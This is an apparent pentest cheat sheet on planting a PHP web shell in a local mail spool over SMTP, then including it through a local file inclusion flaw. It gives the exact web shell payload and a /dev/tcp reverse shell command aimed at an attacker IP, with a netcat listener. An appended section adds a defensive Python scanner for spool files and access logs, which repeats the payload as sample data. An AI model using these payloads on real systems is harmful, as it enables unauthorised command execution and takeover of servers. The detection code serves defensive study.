SMTP Email Shell

This exploit only works if you can view the email on the server (e.g. via LFI).

Connect to SMTP (via telnet or netcat)

  • EHLO <your username> >>> Can be anything

  • VRFY asterisk@localhost >>> Verify a local user account (in this case, asterisk)

  • mail from:<the email address that you want the message to appear from>

  • rcpt to: <the recipient's email address>

  • data

  • Subject: <your subject>

<the contents of your email>

  • For a web shell, type <?php echo system($_REQUEST['app']); ?> as the message contents

Enter a blank line

  • Then end the email with a . on a line by itself

  • The mail will then be sent to /var/mail/asterisk

  • Browse to this file with Burp (through the LFI) to read it and execute requests via your PHP code

  • In the GET request append &app=<linux command> to execute commands on the system

  • Convert this to a POST request >>> Makes things easier

  • Then use this to spawn a shell

  • Append &app=bash -i >& /dev/tcp/<your attacker IP address>/<LPORT> 0>&1

    • Be sure to URL encode this

  • Start up your netcat listener to listen on this LPORT

  • Submit the request to spawn this shell on your attacking machine
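
Added example (not part of the original notes): a defender-side check for the technique above that scans an mbox spool for PHP open tags and scans web access-log lines for request parameters that resolve to a mail spool path. The sample spool, the log lines, /index.php and the page parameter are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# PHP open tags have no business in a local mail spool.
CODE_TAG = re.compile(r"<\?(?:php|=)", re.IGNORECASE)
# Spool paths that an include/read parameter should never resolve to.
SPOOL_PATH = re.compile(r"(?:^|/)var/(?:spool/)?mail/[\w.-]+", re.IGNORECASE)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP')

# Constructed sample data (not from a real system).
SAMPLE_SPOOL = """\
From alice@example.test Mon Jan  1 10:00:00 2024
Subject: backup report

Nightly backup finished.

From tester@example.test Mon Jan  1 10:05:00 2024
Subject: hello

<?php echo system($_REQUEST['app']); ?>
"""
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:06:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:06:30 +0000] "GET /index.php?page=..%2F..%2F..%2Fvar%2Fmail%2Fasterisk&app=id HTTP/1.1" 200 2048',
]

def scan_spool(mbox_text):
    """Return (message_number, envelope_sender, line) for spool lines holding a PHP tag."""
    hits, number, sender = [], 0, None
    for line in mbox_text.splitlines():
        if line.startswith("From "):  # mbox message separator line
            number += 1
            parts = line.split()
            sender = parts[1] if len(parts) > 1 else "?"
        elif CODE_TAG.search(line):
            hits.append((number, sender, line.strip()))
    return hits

def scan_access_log(lines):
    """Return (parameter, decoded_value) pairs whose value points at a mail spool."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        # parse_qsl URL-decodes values, so encoded traversal sequences are normalised first.
        for name, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
            if SPOOL_PATH.search(value):
                hits.append((name, value))
    return hits
```

Parameters moved into a POST body do not appear in a standard access log, so the spool scan is the more reliable of the two checks.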
